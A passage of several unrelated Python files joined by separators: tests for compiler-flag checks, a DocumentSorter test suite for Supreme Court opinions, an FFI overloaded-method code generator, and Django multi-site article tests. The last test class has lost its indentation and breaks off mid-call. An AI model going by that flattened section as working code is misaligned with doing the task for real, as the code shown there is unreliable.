            self.assertEqual(spy.success, sut.language_check(opts, spy.call))
            self.assertEqual(expected, spy.arg['flags'])

        check(['-x', 'c'], {'language': 'c', 'flags': []})
        check(['-x', 'c++'], {'language': 'c++', 'flags': []})

    def test_set_language_from_filename(self):
        def check(expected, opts):
            spy = Spy()
            opts.update({'language': None, 'flags': []})
            self.assertEqual(spy.success, sut.language_check(opts, spy.call))
            self.assertEqual(expected, spy.arg['language'])

        check('c', {'file': 'file.c', 'compiler': 'c'})
        check('c++', {'file': 'file.c', 'compiler': 'c++'})
        check('c++', {'file': 'file.cxx', 'compiler': 'c'})
        check('c++', {'file': 'file.cxx', 'compiler': 'c++'})
        check('c++', {'file': 'file.cpp', 'compiler': 'c++'})
        check('c-cpp-output', {'file': 'file.i', 'compiler': 'c'})
        check('c++-cpp-output', {'file': 'file.i', 'compiler': 'c++'})

    def test_arch_loop_sets_flags(self):
        def flags_for(archs):
            spy = Spy()
            opts = {'flags': [], 'arch_list': archs}
            sut.arch_check(opts, spy.call)
            return spy.arg['flags']

        self.assertEqual([], flags_for([]))
        self.assertEqual(['-arch', 'i386'], flags_for(['i386']))
        self.assertEqual(['-arch', 'i386'], flags_for(['i386', 'ppc']))
        self.assertEqual(['-arch', 'sparc'], flags_for(['i386', 'sparc']))

    def test_arch_loop_stops_on_not_supported(self):
        def check_stops(archs):
            spy = Spy()
            opts = {'flags': [], 'arch_list': archs}
            self.assertIsNone(sut.arch_check(opts, spy.call))
            self.assertIsNone(spy.arg)

        check_stops(['ppc'])
        check_stops(['ppc64'])
# The three helpers below exercise sut.require, used by RequireDecoratorTest.


@sut.require([])
def method_without_expecteds(opts):
    # No required keys: callable with any dict.
    return 0


@sut.require(['this', 'that'])
def method_with_expecteds(opts):
    # Requires both 'this' and 'that' to be present in opts.
    return 0


@sut.require([])
def method_exception_from_inside(opts):
    # Exceptions raised inside the wrapped function must propagate unchanged.
    raise Exception('here is one')
class RequireDecoratorTest(unittest.TestCase):
    """Behavioural tests for the sut.require decorator."""

    def test_method_without_expecteds(self):
        # An empty requirement list accepts any dict, including empty ones.
        for opts in (dict(), {}, {'this': 2}, {'that': 3}):
            self.assertEqual(method_without_expecteds(opts), 0)

    def test_method_with_expecteds(self):
        # Any missing required key raises KeyError.
        for opts in (dict(), {}, {'this': 2}, {'that': 3}):
            self.assertRaises(KeyError, method_with_expecteds, opts)
        # A dict with every required key passes through to the function.
        self.assertEqual(method_with_expecteds({'this': 0, 'that': 3}), 0)

    def test_method_exception_not_caught(self):
        self.assertRaises(Exception, method_exception_from_inside, dict())
| |
'''
Test Cases for DocumentSorter Class for WordCloud Project
Daniel Klein
Computer-Based Honors Program
The University of Alabama
9.27.2013
'''
import unittest
import os, os.path
from src.core.python.SupremeCourtOpinion import SupremeCourtOpinion
from src.core.python.SupremeCourtOpinionMetadata import SupremeCourtOpinionMetadata
from src.core.python.DocumentSorter import DocumentSorter
##### Here are all the global variables used in these tests.
# Raw lines of one well-formed opinion file: metadata header fields first,
# a row of asterisks as separator, then the opinion body paragraphs.
VALID_OPINION_FILE_LINES = ([
"""\
TITLE: UNITED STATES v. JOHNSON ET AL., DOING BUSINESS AS UNITED STATES\
DENTAL CO., ET AL.\
""",
"""CASE NUMBER: No. 43""",
"""US CITATION: 323 U.S. 273""",
"""SUPREME COURT CITATION: 65 S. Ct. 249""",
"""LAWYERS ED CITATION: 89 L. Ed. 236""",
"""LEXIS CITATION: 1944 U.S. LEXIS 1230""",
"""\
FULL CITATION: 323 U.S. 273; 65 S. Ct. 249; 89 L. Ed. 236; 1944 U.S. LEXIS 1230\
""",
"""DATES: November 8, 1944, Argued;December 18, 1944, Decided;""",
"""DISPOSITION: 53 F.Supp. 596, affirmed.""",
"""* * * * * * * *""",
"""MR. JUSTICE MURPHY, concurring.""",
"""I join in the opinion of the Court and believe that the judgment should be \
affirmed.""",
"""Congress has the constitutional power to fix venue at any place where a \
crime occurs. Our problem here is to determine, in the absence of a specific \
venue provision, where the crime outlawed by the Federal Denture Act occurred \
for purposes of venue.""",
"""The Act prohibits the use of the mails for the purpose of sending or \
bringing into any state certain prohibited articles. It is undisputed that \
when a defendant places a prohibited article in the mails in Illinois for \
the purpose of sending it into Delaware he has completed a statutory offense. \
Hence he is triable in Illinois. But to hold that the statutory crime also \
encompasses the receipt of the prohibited article in Delaware, justifying a \
trial at that point, requires an implication that I am unwilling to make in \
the absence of more explicit Congressional language.""",
"""Very often the difference between liberty and imprisonment in cases where \
the direct evidence offered by the government and the defendant is evenly \
balanced depends upon the presence of character witnesses. The defendant is \
more likely to obtain their presence in the district of his residence, which \
in this instance is usually the place where the prohibited article is mailed. \
The inconvenience, expense and loss of time involved in transplanting these \
witnesses to testify in trials far removed from their homes are often too \
great to warrant their use. Moreover, they are likely to lose much of their \
effectiveness before a distant jury that knows nothing of their reputations. \
Such factors make it difficult for me to conclude, where Congress has not \
said so specifically, that we should construe the Federal Denture Act as \
covering more than the first sufficient and punishable use of the mails \
insofar as the sender of a prohibited article is concerned. The principle of \
narrow construction of criminal statutes does not warrant interpreting the \
"use" of the mails to cover all possible uses in light of the foregoing \
considerations."""])
# Expected metadata values parsed from the file lines above.
CASE_TITLE = """\
UNITED STATES v. JOHNSON ET AL., DOING BUSINESS AS UNITED STATES\
DENTAL CO., ET AL.\
"""
CASE_NUM = "No. 43"
CASE_US_CITE = "323 U.S. 273"
CASE_SUPREME_COURT_CITE = "65 S. Ct. 249"
CASE_LAWYERS_ED_CITE = "89 L. Ed. 236"
CASE_LEXIS_CITE = "1944 U.S. LEXIS 1230"
CASE_FULL_CITE = "323 U.S. 273; 65 S. Ct. 249; 89 L. Ed. 236; 1944 U.S. LEXIS 1230"
CASE_DATES = [("November 8, 1944", "Argued"),("December 18, 1944", "Decided")]
CASE_DISPOSITION = "53 F.Supp. 596, affirmed."
OPINION_AUTHOR = "MURPHY"
# Everything after the asterisk separator (line index 10 onward) is body text.
OPINION_TEXT = "\n".join(VALID_OPINION_FILE_LINES[10:])
# Scratch path used by the fixtures for pickling documents.
TEST_PICKLE_PATH = os.path.join(os.path.abspath(os.curdir), "pickled_test_doc")
#######
def create_test_docs():
    """Build the five SupremeCourtOpinion fixtures used by DocumentSorterTest.

    Doc 0 has fully populated metadata; docs 1 and 4 only repeat case number
    "No. 43"; docs 2 and 3 carry distinct case numbers and opinion authors.
    All five share the same opinion text and pickle path.
    """
    def make_opinion(**fields):
        # Build a metadata object, set only the given fields, wrap it.
        meta = SupremeCourtOpinionMetadata()
        for name, value in fields.items():
            setattr(meta, name, value)
        return SupremeCourtOpinion(meta, OPINION_TEXT, TEST_PICKLE_PATH)

    return [
        make_opinion(
            case_title=CASE_TITLE,
            case_num=CASE_NUM,
            case_us_cite=CASE_US_CITE,
            case_supreme_court_cite=CASE_SUPREME_COURT_CITE,
            case_lawyers_ed_cite=CASE_LAWYERS_ED_CITE,
            case_lexis_cite=CASE_LEXIS_CITE,
            case_full_cite=CASE_FULL_CITE,
            case_dates=CASE_DATES,
            case_disposition=CASE_DISPOSITION,
            opinion_author=OPINION_AUTHOR,
        ),
        make_opinion(case_num="No. 43"),
        make_opinion(case_num="No. 67", opinion_author="JOHNSON"),
        make_opinion(case_num="No. 46", opinion_author="MURPHY"),
        make_opinion(case_num="No. 43"),
    ]
class DocumentSorterTest(unittest.TestCase):
    """Unit tests for DocumentSorter: sorting, subsetting and adding docs."""

    def setUp(self):
        # Five opinions: docs 0, 1 and 4 share case_num "No. 43";
        # doc 2 is "No. 67"/JOHNSON and doc 3 is "No. 46"/MURPHY.
        self.test_docs = create_test_docs()
        self.test_sorter = DocumentSorter(self.test_docs)
    def tearDown(self):
        del self.test_sorter
        del self.test_docs
    def testSortDocsNormalCase(self):
        # If I sort on case num, I should get one subset of 3 for "No. 43",
        # a subset of 1 for "No. 46", and a subset of 1 for "No. 67"
        print("DocumentSorterTest: testing DocumentSorter.sort_docs normal case.")
        sorted_subsets = self.test_sorter.sort_docs("case_num")
        expected_subsets = ([[self.test_docs[0],self.test_docs[1],self.test_docs[4]],
                             [self.test_docs[3]], [self.test_docs[2]]])
        self.assertEqual(len(expected_subsets), len(sorted_subsets))
        # Compare subset-by-subset, then doc-by-doc on the sort key.
        for i in range(len(expected_subsets)):
            expected_subset = expected_subsets[i]
            sorted_subset = sorted_subsets[i]
            self.assertEqual(len(expected_subset), len(sorted_subset))
            for j in range(len(expected_subsets[i])):
                expected_doc = expected_subsets[i][j]
                sorted_doc = sorted_subsets[i][j]
                self.assertEqual(expected_doc.doc_metadata.case_num,
                                 sorted_doc.doc_metadata.case_num)
    def testSortDocsEmptyInputList(self):
        # Sorting an empty doc list just returns an empty list of subsets.
        print("DocumentSorterTest: testing DocumentSorter.sort_docs with empty input list of docs.")
        self.test_sorter.doc_list = []
        sorted_subsets = self.test_sorter.sort_docs("case_num")
        expected_subsets = []
        self.assertEqual(expected_subsets, sorted_subsets)
    def testSortDocsNonDocObject(self):
        print("DocumentSorterTest: testing DocumentSorter.sort_docs with input "
              "list of docs containing non-Document object...")
        # A non-Document entry in the list should make sort_docs raise.
        self.test_docs.append("THIS IS A STRING")
        self.assertRaises(Exception, self.test_sorter.sort_docs, "case_num")
    def testSortDocsInvalidSortField(self):
        print("DocumentSorterTest: testing DocumentSorter.sort_docs with invalid sort field...")
        # Sorting on a metadata field that does not exist should raise.
        self.assertRaises(Exception, self.test_sorter.sort_docs, "this_isnt_a_field")
    def testCreateSubsetNormalCase(self):
        print("DocumentSorterTest: testing DocumentSorter.create_subset normal case...")
        # If I create a subset where author is in ["JOHNSON", "MURPHY"], I
        # should get a subset of 3 -- 2 MURPHY (docs 0 and 3), 1 JOHNSON (doc 2)
        test_allowed_values = ["MURPHY", "JOHNSON"]
        expected_subset = [self.test_docs[0], self.test_docs[2], self.test_docs[3]]
        created_subset = self.test_sorter.create_subset("opinion_author", test_allowed_values)
        self.assertEqual(expected_subset, created_subset)
    def testCreateSubsetNoAllowedValues(self):
        print ("DocumentSorterTest: testing DocumentSorter.create_subset with no "
               "list of allowed values...")
        # An empty allowed-values list yields an empty subset.
        test_allowed_values = []
        expected_subset = []
        created_subset = self.test_sorter.create_subset("opinion_author", test_allowed_values)
        self.assertEqual(expected_subset, created_subset)
    def testCreateSubsetNoAllowedValueMatches(self):
        print("DocumentSorterTest: testing DocumentSorter.create_subset with no "
              "matches on the allowed values...")
        # Allowed values that match no document also yield an empty subset.
        test_allowed_values = ["JACKSON", "THOMPSON"]
        expected_subset = []
        created_subset = self.test_sorter.create_subset("opinion_author", test_allowed_values)
        self.assertEqual(expected_subset, created_subset)
    def testAddDocNormalCase(self):
        print("DocumentSorterTest: testing DocumentSorter.add_doc normal case...")
        # Adding a valid opinion appends it to the end of doc_list.
        test_meta = SupremeCourtOpinionMetadata()
        test_meta.case_num = "No. 99"
        test_doc = SupremeCourtOpinion(test_meta, OPINION_TEXT, TEST_PICKLE_PATH)
        self.assertEqual(len(self.test_sorter.doc_list), 5)
        self.test_sorter.add_doc(test_doc)
        self.assertEqual(len(self.test_sorter.doc_list), 6)
        self.assertEqual(self.test_sorter.doc_list[5], test_doc)
    def testAddDocWithNonSupremeCourtOpinion(self):
        print("DocumentSorterTest: testing DocumentSorter.add_doc with non-Document...")
        # add_doc must reject objects that are not Documents (e.g. anything
        # lacking doc_metadata).
        self.assertRaises(Exception, self.test_sorter.add_doc, "THIS IS NOT A DOC")
if __name__ == "__main__":
    # Run every test in this module when executed directly.
    unittest.main()
| |
from direct.showbase.PythonUtil import *
from types import *
import string
import FFIConstants
import FFISpecs
import FFITypes
"""
Things that are not supported:
- Overloading a function based on an enum being differentiated from an int
- Type names from C++ cannot have __enum__ in their name
- Overloading static and non-static methods with the same name
"""
# Atomic-type codes: numeric tags distinguishing the C++ primitive types.
# getTypeName uses these to map each primitive onto a Python type name.
AT_not_atomic = 0
AT_int = 1
AT_float = 2
AT_double = 3
AT_bool = 4
AT_char = 5
AT_void = 6
AT_string = 7
AT_longlong = 8
def cullOverloadedMethods(fullMethodDict):
    """
    Return only the entries of fullMethodDict whose method name has more
    than one specification (i.e. is overloaded), dropping the rest.
    Every specification kept is marked with overloaded = 1 as a side effect.
    """
    overloadedOnly = {}
    for methodName, specList in fullMethodDict.items():
        # A single spec means the name is not overloaded; skip it.
        if len(specList) <= 1:
            continue
        overloadedOnly[methodName] = specList
        # Flag each surviving specification as overloaded.
        for spec in specList:
            spec.overloaded = 1
    return overloadedOnly
def getTypeName(classTypeDesc, typeDesc):
    """
    Map an interrogate type descriptor onto the Python type name used by
    the generated isinstance checks.  classTypeDesc is the class currently
    being generated (None at global scope); callers are assumed to have
    imported the types module so names like IntType resolve.
    """
    typeName = typeDesc.getFullNestedName()
    if typeDesc.isAtomic():
        # Atomic C++ types are checked against the Python builtin types.
        atomic = typeDesc.atomicType
        if atomic in (AT_int, AT_bool, AT_char):
            # Ints, bools and chars are all plain Python ints.
            return 'IntType'
        if atomic in (AT_float, AT_double):
            # Floats and doubles are both Python floats.
            return 'FloatType'
        if atomic == AT_longlong:
            return 'LongType'
        if atomic == AT_string:
            return 'StringType'
        if atomic == AT_void:
            # void maps to NoneType; nothing currently exercises this.
            return 'NoneType'
        FFIConstants.notify.error("Unknown atomicType: %s" % (atomic))
    elif '__enum__' in typeName:
        # Enums are tagged with __enum__ somewhere in their (possibly
        # class-qualified) name and are treated as plain ints.
        return 'IntType'
    else:
        # A class type.  Emit "Module.TypeName" unless this type and the
        # enclosing class are nested within one another, in which case the
        # plain nested name already resolves correctly.
        nestedNames = typeName.split('.')
        qualifiedName = nestedNames[0] + '.' + typeName
        if not classTypeDesc:
            # Outside any class we always need the module qualification.
            return qualifiedName
        classNestedNames = classTypeDesc.getFullNestedName().split('.')
        if ((classTypeDesc.foreignTypeName not in nestedNames) and
                (typeDesc.foreignTypeName not in classNestedNames)):
            return qualifiedName
        return typeName
def inheritsFrom(type1, type2):
    """
    Return 1 if type1 inherits (directly or transitively) from type2,
    else 0.  Walks parentTypes recursively.
    """
    parents = type1.parentTypes
    if not parents:
        # No parents at all: cannot inherit from anything.
        return 0
    if type2 in parents:
        # Direct parent.
        return 1
    # Otherwise look further up through each ancestor chain.
    for ancestor in parents:
        if inheritsFrom(ancestor, type2):
            return 1
    return 0
def getInheritanceLevel(type, checkNested = 1):
    """
    Return how deep this type sits in the inheritance graph.

    PyObject * reports -1: it is the most general type, since everything
    is a PyObject.  A nested type starts from its outer type's level;
    checkNested=0 suppresses the outer type's walk back down into its
    nested children so the two do not recurse into each other forever.
    """
    if type.__class__ == FFITypes.PyObjectTypeDescriptor:
        return -1
    if type.isNested:
        # Start from the enclosing class's level (checkNested=0 breaks the
        # outer/inner recursion cycle).
        baseLevel = getInheritanceLevel(type.outerType, 0)
    else:
        baseLevel = 0
    # Candidate levels: one more than each parent, plus (optionally) the
    # levels of the nested types, which do not add a level of their own.
    candidates = [baseLevel]
    for parentType in type.parentTypes:
        candidates.append(1 + getInheritanceLevel(parentType))
    if checkNested:
        for nestedType in type.nestedTypes:
            candidates.append(getInheritanceLevel(nestedType))
    return max(candidates)
def inheritanceLevelSort(type1, type2):
    """
    cmp-style comparator ordering types by inheritance depth, breaking
    ties alphabetically on the C++ type name.
    """
    level1 = getInheritanceLevel(type1)
    level2 = getInheritanceLevel(type2)
    if level1 != level2:
        # Shallower types sort first; emit the usual -1/1 cmp result.
        return (level1 > level2) - (level1 < level2)
    # Equal depth: fall back to name order for a stable result.
    return cmp(type1.foreignTypeName, type2.foreignTypeName)
def subclass(type1, type2):
    """
    cmp-style helper function used in sorting classes by inheritance.
    """
    # Identical types compare equal.
    if type1 == type2:
        return 0
    # 0 is the sentinel key for the no-argument overload; give it a fixed
    # position in the ordering.
    if type1 == 0:
        return 1
    if type2 == 0:
        return -1
    # A class that inherits from the other sorts before it, so the most
    # specific isinstance check is emitted first.
    if inheritsFrom(type1, type2):
        return -1
    if inheritsFrom(type2, type1):
        return 1
    # Unrelated types: fall back to (reverse) name order purely so the
    # result is deterministic rather than arbitrary.
    if type1.foreignTypeName > type2.foreignTypeName:
        return -1
    return 1
class FFIMethodArgumentTreeCollection:
    """
    Collects all the overload specifications for one method name and emits
    the Python dispatch wrapper for it: a header that counts _args, one
    branch per argument count (each handled by an FFIMethodArgumentTree),
    and a footer that binds the wrapper onto the class or marks it static.
    """
    def __init__(self, classTypeDesc, methodSpecList):
        # classTypeDesc may be None for global functions.
        self.classTypeDesc = classTypeDesc
        self.methodSpecList = methodSpecList
        # Maps number-of-arguments -> list of method specs with that arity.
        self.methodDict = {}
        # Maps number-of-arguments -> list of FFIMethodArgumentTree.
        self.treeDict = {}
    def outputOverloadedMethodHeader(self, file, nesting):
        # Emit the 'def name(...)' line and the numArgs computation.
        # If one is static, we assume they all are.
        # The current system does not support overloading static and non-static
        # methods with the same name
        # Constructors are not treated as static. They are special because
        # they are not really constructors, they are instance methods that fill
        # in the this pointer.
        # Global functions do not need static versions
        if (self.methodSpecList[0].isStatic() and
            (not self.methodSpecList[0].isConstructor())):
            indent(file, nesting, 'def ' +
                   self.methodSpecList[0].name + '(*_args):\n')
        else:
            indent(file, nesting, 'def ' +
                   self.methodSpecList[0].name + '(self, *_args):\n')
        self.methodSpecList[0].outputCFunctionComment(file, nesting+2)
        indent(file, nesting+2, 'numArgs = len(_args)\n')
    def outputOverloadedMethodFooter(self, file, nesting):
        # Emit the code that attaches the just-defined wrapper to its class.
        # If this is a static method, we need to output a static version
        # If one is static, we assume they all are.
        # The current system does not support overloading static and non-static
        # methods with the same name
        # Constructors are not treated as static. They are special because
        # they are not really constructors, they are instance methods that fill
        # in the this pointer.
        methodName = self.methodSpecList[0].name
        if (self.methodSpecList[0].isStatic() and
            (not self.methodSpecList[0].isConstructor()) and
            (not isinstance(self.methodSpecList[0], FFISpecs.GlobalFunctionSpecification))):
            self.outputOverloadedStaticFooter(file, nesting)
        else:
            if self.classTypeDesc:
                # Instance method: patch it onto the class, then delete the
                # module-level name.
                indent(file, nesting, "FFIExternalObject.funcToMethod("+methodName+','+ self.classTypeDesc.foreignTypeName+ ",'"+methodName+"')\n")
                indent(file, nesting, 'del '+methodName+'\n')
            indent(file, nesting, ' \n')
            indent(file, nesting+1, '\n')
    def outputOverloadedStaticFooter(self, file, nesting):
        # Emit the py2-style staticmethod rebinding: foo = staticmethod(foo)
        methodName = self.methodSpecList[0].name
        indent(file, nesting, self.classTypeDesc.foreignTypeName + '.' + methodName + ' = staticmethod(' + methodName + ')\n')
        indent(file, nesting,'del ' +methodName+' \n\n')
    def setup(self):
        # Bucket the specs by arity, then build one decision tree per arity.
        for method in self.methodSpecList:
            numArgs = len(method.typeDescriptor.thislessArgTypes())
            numArgsList = self.methodDict.setdefault(numArgs, [])
            numArgsList.append(method)
        for numArgs in self.methodDict.keys():
            methodList = self.methodDict[numArgs]
            tree = FFIMethodArgumentTree(self.classTypeDesc, methodList)
            treeList = self.treeDict.setdefault(numArgs, [])
            treeList.append(tree)
    def generateCode(self, file, nesting):
        # Emit the complete dispatch wrapper: header, one (el)if branch per
        # argument count with its type-checking tree, a trailing else that
        # raises TypeError (py2 syntax in the generated code), and footer.
        self.setup()
        self.outputOverloadedMethodHeader(file, nesting)
        numArgsKeys = self.treeDict.keys()
        numArgsKeys.sort()
        for i in range(len(numArgsKeys)):
            numArgs = numArgsKeys[i]
            trees = self.treeDict[numArgs]
            for tree in trees:
                # If this is the first case, output an if clause
                if (i == 0):
                    indent(file, nesting+2, 'if (numArgs == ' + repr(numArgs) + '):\n')
                # If this is a subsequent first case, output an elif clause
                else:
                    indent(file, nesting+2, 'elif (numArgs == ' + repr(numArgs) + '):\n')
                tree.setup()
                tree.traverse(file, nesting+1, 0)
        # If the overloaded function got all the way through the if statements
        # it must have had the wrong number or type of arguments
        indent(file, nesting+2, "else:\n")
        indent(file, nesting+3, "raise TypeError, 'Invalid number of arguments: ' + repr(numArgs) + ', expected one of: ")
        for numArgs in numArgsKeys:
            indent(file, 0, (repr(numArgs) + ' '))
        indent(file, 0, "'\n")
        self.outputOverloadedMethodFooter(file, nesting)
class FFIMethodArgumentTree:
    """
    Decision tree used to pick an overload once the argument count is known.

    Implemented as nested dictionaries: each key is the type descriptor for
    the argument at the current depth (or 0 for the no-argument case) and
    each value is a pair [subtree, methodSpec].  methodSpec may be None at
    any level; a leaf node has subtree None and methodSpec set.
    """
    def __init__(self, classTypeDesc, methodSpecList):
        # argSpec holds the most recently examined argument specification.
        self.argSpec = None
        self.classTypeDesc = classTypeDesc
        self.methodSpecList = methodSpecList
        # The actual tree is implemented as nested dictionaries
        self.tree = {}
    def setup(self):
        # Insert every overload's argument-type chain into the tree.
        for methodSpec in self.methodSpecList:
            argTypes = methodSpec.typeDescriptor.thislessArgTypes()
            self.fillInArgTypes(argTypes, methodSpec)
    def fillInArgTypes(self, argTypes, methodSpec):
        """Recursively insert one overload, keyed by its argument types."""
        # If the method takes no arguments, we will assign a type index of 0
        if (len(argTypes) == 0):
            self.tree[0] = [
                FFIMethodArgumentTree(self.classTypeDesc,
                                      self.methodSpecList),
                methodSpec]
        else:
            self.argSpec = argTypes[0]
            typeDesc = self.argSpec.typeDescriptor.recursiveTypeDescriptor()
            if (len(argTypes) == 1):
                # If this is the last parameter, we are a leaf node, so store the
                # methodSpec in this dictionary
                self.tree[typeDesc] = [None, methodSpec]
            else:
                if typeDesc in self.tree:
                    # If there already is a tree here, jump into and pass the
                    # cdr of the arg list
                    subTree = self.tree[typeDesc][0]
                    subTree.fillInArgTypes(argTypes[1:], methodSpec)
                else:
                    # Add a subtree for the rest of the arg list
                    subTree = FFIMethodArgumentTree(self.classTypeDesc,
                                                    self.methodSpecList)
                    subTree.fillInArgTypes(argTypes[1:], methodSpec)
                    # This subtree has no method spec
                    self.tree[typeDesc] = [subTree, None]
    def traverse(self, file, nesting, level):
        """Emit isinstance-dispatch code for the subtree rooted here."""
        oneTreeHasArgs = 0
        typeNameList = []
        # First see if this tree branches at all. If it does not there are
        # drastic optimizations we can take because we can simply call the
        # bottom-most function. We are not checking the types of all the
        # arguments for the sake of type checking, we are simply trying to
        # figure out which overloaded function to call. If there is only
        # one overloaded function with this number of arguements at this
        # level, it must be the one. No need to continue checking all the
        # arguments.
        branches = 0
        subTree = self
        prevTree = subTree
        levelCopy = level
        while subTree:
            if (len(subTree.tree.keys()) == 0):
                # Dead end branch
                break
            if (len(subTree.tree.keys()) > 1):
                # Ok, we branch, it was worth a try though
                branches = 1
                break
            prevTree = subTree
            # Must only have one subtree, traverse it
            subTree = subTree.tree.values()[0][0]
            levelCopy += 1
        # If there were no branches, this is easy
        # Just output the function and return
        # Note this operates on prevTree because subTree went one too far
        if not branches:
            methodSpec = prevTree.tree.values()[0][1]
            indent(file, nesting+2, 'return ')
            methodSpec.outputOverloadedCall(file, prevTree.classTypeDesc, levelCopy)
            return
        # Ok, We must have a branch down here somewhere
        # Make a copy of the keys so we can sort them in place
        sortedKeys = self.tree.keys()
        # Sort the keys based on inheritance hierarchy, most specific classes first
        sortedKeys.sort(subclass)
        for i in range(len(sortedKeys)):
            typeDesc = sortedKeys[i]
            # See if this takes no arguments
            if (typeDesc == 0):
                # Output the function
                methodSpec = self.tree[0][1]
                indent(file, nesting+2, 'return ')
                methodSpec.outputOverloadedCall(file, self.classTypeDesc, 0)
            else:
                # (Per-type import emission used to live here; imports are
                # handled at the top of the generated file now.)
                # Specify that at least one of these trees had arguments
                # so we know to output an else clause
                oneTreeHasArgs = 1
                typeName = getTypeName(self.classTypeDesc, typeDesc)
                typeNameList.append(typeName)
                if typeDesc.__class__ == FFITypes.PyObjectTypeDescriptor:
                    # A special case: if one of the parameters is
                    # PyObject *, that means anything is accepted.
                    condition = '1'
                else:
                    # Otherwise, we'll check the particular type of
                    # the object.
                    condition = '(isinstance(_args[' + repr(level) + '], ' + typeName + '))'
                    # Legal types for a float parameter include int and long.
                    if (typeName == 'FloatType'):
                        condition += (' or (isinstance(_args[' + repr(level) + '], IntType))')
                        condition += (' or (isinstance(_args[' + repr(level) + '], LongType))')
                    # Legal types for a long parameter include int.
                    elif (typeName == 'LongType'):
                        condition += (' or (isinstance(_args[' + repr(level) + '], IntType))')
                    # Legal types for an int parameter include long.
                    elif (typeName == 'IntType'):
                        condition += (' or (isinstance(_args[' + repr(level) + '], LongType))')
                indent(file, nesting+2, 'if ' + condition + ':\n')
                if (self.tree[typeDesc][0] is not None):
                    # Interior node: recurse to check the next argument.
                    self.tree[typeDesc][0].traverse(file, nesting+1, level+1)
                else:
                    # Leaf node: emit the call to the resolved overload.
                    methodSpec = self.tree[typeDesc][1]
                    indent(file, nesting+3, 'return ')
                    numArgs = level+1
                    methodSpec.outputOverloadedCall(file, self.classTypeDesc, numArgs)
        # Output an else clause if one of the trees had arguments
        if oneTreeHasArgs:
            indent(file, nesting+2, "raise TypeError, 'Invalid argument " + repr(level) + ", expected one of: ")
            for name in typeNameList:
                indent(file, 0, ('<' + name + '> '))
            indent(file, 0, "'\n")
    def isSinglePath(self):
        # Return the sole leaf methodSpec if this tree never branches,
        # or 0 as soon as a node has more than one child.
        if (len(self.tree.keys()) > 1):
            # More than one child, return false
            return 0
        else:
            # Only have one child, see if he only has one child
            key = self.tree.keys()[0]
            tree = self.tree[key][0]
            if tree:
                return tree.isSinglePath()
            else:
                return self.tree[key][1]
| |
# -*- coding: utf-8 -*-
from datetime import timedelta
from django.contrib.sites.models import Site
from django.conf import settings
from django.urls import reverse
from model_mommy import mommy
from coop_cms.models import BaseArticle, ArticleCategory
from coop_cms.settings import get_article_class
from coop_cms.tests import BaseArticleTest, BaseTestCase, BeautifulSoup
class MultiSiteTest(BaseTestCase):
    """Article visibility (200 vs 404) when the active django Site changes."""

    def tearDown(self):
        super(MultiSiteTest, self).tearDown()
        # Point SITE_ID back at the default site so later tests are unaffected.
        settings.SITE_ID = Site.objects.all()[0].id

    def _default_and_extra_site(self):
        # Return the pre-existing default site plus a freshly created one.
        return (Site.objects.all()[0],
                Site.objects.create(domain='hhtp://test2', name="Test2"))

    def _published_article(self):
        # Create a published article attached to the currently active site.
        return get_article_class().objects.create(
            title="test", publication=BaseArticle.PUBLISHED)

    def test_view_article(self):
        default_site, extra_site = self._default_and_extra_site()
        settings.SITE_ID = default_site.id
        article = self._published_article()
        response = self.client.get(article.get_absolute_url())
        self.assertEqual(200, response.status_code)

    def test_view_article_on_site2(self):
        default_site, extra_site = self._default_and_extra_site()
        settings.SITE_ID = extra_site.id
        article = self._published_article()
        response = self.client.get(article.get_absolute_url())
        self.assertEqual(200, response.status_code)

    def test_view_article_on_all_sites(self):
        default_site, extra_site = self._default_and_extra_site()
        settings.SITE_ID = default_site.id
        article = self._published_article()
        article.sites.add(extra_site)
        article.save()
        # Visible on the site it was created on...
        response = self.client.get(article.get_absolute_url())
        self.assertEqual(200, response.status_code)
        # ...and on the extra site it was added to.
        settings.SITE_ID = extra_site.id
        response = self.client.get(article.get_absolute_url())
        self.assertEqual(200, response.status_code)

    def test_view_404_site2(self):
        default_site, extra_site = self._default_and_extra_site()
        settings.SITE_ID = default_site.id
        article = self._published_article()
        # The article only belongs to the default site: 404 elsewhere.
        settings.SITE_ID = extra_site.id
        response = self.client.get(article.get_absolute_url())
        self.assertEqual(404, response.status_code)

    def test_view_only_site2(self):
        default_site, extra_site = self._default_and_extra_site()
        settings.SITE_ID = default_site.id
        article = self._published_article()
        # Move the article from the default site to the extra site only.
        article.sites.remove(default_site)
        article.sites.add(extra_site)
        article.save()
        settings.SITE_ID = default_site.id
        response = self.client.get(article.get_absolute_url())
        self.assertEqual(404, response.status_code)
        settings.SITE_ID = extra_site.id
        response = self.client.get(article.get_absolute_url())
        self.assertEqual(200, response.status_code)
class MultiSiteCategoryTest(BaseArticleTest):
def setUp(self):
self.settings_site_id = settings.SITE_ID
settings.SITE_ID = 1
def tearDown(self):
settings.SITE_ID = self.settings_site_id
def test_article_category_other_site(self):
article_class = get_article_class()
site1 = Site.objects.get(id=settings.SITE_ID)
site2 = mommy.make(Site)
cat = mommy.make(ArticleCategory)
art1 = mommy.make(article_class, slug="test1", category=cat, publication=BaseArticle.PUBLISHED)
art2 = mommy.make(
article_class, slug="test2", category=cat, publication=BaseArticle.PUBLISHED,
publication_date=art1.publication_date+timedelta(1))
art2.sites.add(site2)
art2.sites.remove(site1)
art2.save()
art3 = mommy.make(article_class, slug="test3", category=cat, publication=BaseArticle.PUBLISHED,
publication_date=art1.publication_date-timedelta(1))
art3.sites.add(site2)
art3.sites.remove(site1)
art3.save()
self.assertEqual(art1.previous_in_category(), None)
self.assertEqual(art1.next_in_category(), None)
def test_article_category_same_site(self):
article_class = get_article_class()
site1 = Site.objects.get(id=settings.SITE_ID)
site2 = mommy.make(Site)
cat = mommy.make(ArticleCategory)
art1 = mommy.make(article_class, slug="test1", category=cat, publication=BaseArticle.PUBLISHED)
art2 = mommy.make(article_class, slug="test2", category=cat, publication=BaseArticle.PUBLISHED,
publication_date=art1.publication_date+timedelta(1))
art3 = mommy.make(article_class, slug="test3", category=cat, publication=BaseArticle.PUBLISHED,
publication_date=art1.publication_date-timedelta(1))
art3.sites.add(site2)
art3.save()
self.assertEqual(art1.previous_in_category(), art3)
self.assertEqual(art1.next_in_category(), art2)
def test_article_category_not_published(self):
article_class = get_article_class()
site1 = Site.objects.get(id=settings.SITE_ID)
site2 = mommy.make(Site)
cat = mommy.make(ArticleCategory)
art1 = mommy.make(article_class, slug="test1", category=cat, publication=BaseArticle.PUBLISHED)
art2 = mommy.make(article_class, slug="test2", category=cat, publication=BaseArticle.DRAFT,
publication_date=art1.publication_date+timedelta(1))
art3 = mommy.make(article_class, slug="test3", category=cat, publication=BaseArticle.DRAFT,
